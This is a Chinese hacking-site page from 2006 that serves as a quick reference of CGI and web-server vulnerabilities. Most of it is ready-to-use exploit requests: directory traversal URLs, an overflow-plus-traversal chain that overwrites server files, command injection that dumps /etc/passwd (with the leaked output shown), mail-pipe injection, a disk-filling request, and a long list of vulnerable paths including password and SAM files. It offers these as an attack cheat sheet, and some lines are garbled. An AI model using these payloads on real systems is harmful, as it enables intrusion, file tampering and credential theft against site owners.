你的位置:首页>>黑客攻防技术内幕>>CGI及系统漏洞速查(2)

CGI及系统漏洞速查(2)

发表时间：2006-8-29 下午 12:14:37

浏览次数：

用Count.cgi看图片：

http://server/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

● finger.cgi

lynx http://www.server/cgi-bin/finger?@localhost

得到主机上登录的用户名。

● JFS

漏洞介绍：利用photoads这个CGI模块攻入主机，可以入侵PCWEEK-LINUX 主机，具体如下：

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%0a11111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&password=

0&CityStPhone=0&Renewed=0"

创建新AD值绕过 $AdNum 的检查后用：

lynx ''http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111&DataFile=

1&Password=0&FILE_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif''

创建/覆盖用户 nobody 有权写的任何文件。

● visadmin.exe

http://server/cgi-bin/visadmin.exe?user=guest

这个命令行将不停的向服务器的硬盘里写东西，直到写满为止。

● campas

telnet www.xxxx.net 80

Trying 200.xx.xx.xx...

Connected to venus.xxxx.net

Escape character is ''^]''.

GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a

root:x:0:1:Super-User:/export/home/root:/sbin/sh

daemon:x:1:1::/:

bin:x:2:2::/usr/bin:

sys:x:3:3::/:

adm:x:4:4:Admin:/var/adm:

lp:x:71:8:Line Printer Admin:/usr/spool/lp:

smtp:x:0:0:Mail Daemon User:/:/bin/false

● webgais

query='';mail+foo@somewhere.nettelnet target.machine.com 80

POST /cgi-bin/webgais HTTP/1.0

Content-length: 85 (replace this with the actual length of the "exploit"line)

query='';mail+drazvan\@pop3.kappa.roparagraph

telnet target.machine.com 80

POST /cgi-bin/websendmail HTTP/1.0

Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.orgubject=a

&content=a

● wrap

http://server/cgi-bin/wrap?/../../../../../etc

漏洞介绍：列出etc目录里的文件，下面是可能包含漏洞的所有CGI程序名：

/cgi-bin/rwwwshell.pl

/cgi-bin/phf

/cgi-bin/Count.cgi

/cgi-bin/test.cgi

/cgi-bin/nph-test-cgi

/cgi-bin/nph-publish

/cgi-bin/php.cgi

/cgi-bin/handler

/cgi-bin/webgais

/cgi-bin/websendmail

/cgi-bin/webdist.cgi

/cgi-bin/faxsurvey

/cgi-bin/htmlscript /cgi-bin/pfdisplay.cgi

/cgi-bin/perl.exe

/cgi-bin/wwwboard.pl

/cgi-bin/www-sql

/cgi-bin/view-source

/cgi-bin/campas

/cgi-bin/aglimpse

/cgi-bin/glimpse

/cgi-bin/man.sh

/cgi-bin/AT-admin.cgi

/scripts/no-such-file.pl

/_vti_bin/shtml.dll

/_vti_inf.html

/_vti_pvt/administrators.pwd

/_vti_pvt/users.pwd

/msadc/Samples/SELECTOR/showcode.asp

/scripts/iisadmin/ism.dll?http/dir

/adsamples/config/site.csc

/main.asp%81

/AdvWorks/equipment/catalog_type.asp?

/cgi-bin/input.bat?|dir..\..\windows

/index.asp::$DATA

/cgi-bin/visadmin.exe?user=guest

/?PageServices

/ss.cfg

/cgi-bin/get32.exe|echo%20>c:\file.txt

/cgi-bin/cachemgr.cgi

/cgi-bin/pfdispaly.cgi?/../../../../etc/motd

/domcfg.nsf /today.nsf

/names.nsf

/catalog.nsf

/log.nsf

/domlog.nsf

/cgi-bin/AT-generate.cgi

/secure/.wwwacl

/secure/.htaccess

/samples/search/webhits.exe

/scripts/srchadm/admin.idq

/cgi-bin/dumpenv.pl

adminlogin?RCpage=/sysadmin/index.stm /c:/program

/getdrvrs.exe

/test/test.cgi

/scripts/submit.cgi

/users/scripts/submit.cgi

/ncl_items.html?SUBJECT=2097 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi-bin/jj /cgi-bin/info2www

/cgi-bin/files.pl

/cgi-bin/finger

/cgi-bin/bnbform.cgi

/cgi-bin/survey.cgi

/cgi-bin/AnyForm2

/cgi-bin/textcounter.pl

/cgi-bin/classifieds.cgi

/cgi-bin/environ.cgi

/cgi-bin/wrap

/cgi-bin/cgiwrap

/cgi-bin/guestbook.cgi

/cgi-bin/edit.pl

/cgi-bin/perlshop.cgi

/_vti_inf.html

/_vti_pvt/service.pwd

/_vti_pvt/users.pwd

/_vti_pvt/authors.pwd

/_vti_pvt/administrators.pwd

/cgi-win/uploader.exe

/../../config.sys

/iisadmpwd/achg.htr

/iisadmpwd/aexp.htr

/iisadmpwd/aexp2.htr

/iisadmpwd/aexp4b.htr

/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._

/cfdocs/expeval/openfile.cfm

/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._

/CFIDE/Administrator/startstop.html

/cgi-bin/wwwboard.pl

/_vti_pvt/shtml.dll

/_vti_pvt/shtml.exe

/cgi-dos/args.bat

/cgi-win/uploader.exe

/cgi-bin/rguest.exe

/cgi-bin/wguest.exe

/scripts/issadmin/bdir.htr

/scripts/CGImail.exe

/scripts/tools/newdsn.exe

/scripts/fpcount.exe

cfdocs/expelval/openfile.cfm

/cfdocs/expelval/exprcalc.cfm

/cfdocs/expelval/displayopenedfile.cfm

/cfdocs/expelval/sendmail.cfm

/iissamples/exair/howitworks/codebrws.asp

/iissamples/sdk/asp/docs/codebrws.asp

/msads/Samples/SELECTOR/showcode.asp

/search97.vts

/carbo.dll

/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

/doc

/.html/............./config.sys

/....../

发表评论　

打印本文　

推荐本文　

加入收藏　

返回顶部　

关闭窗口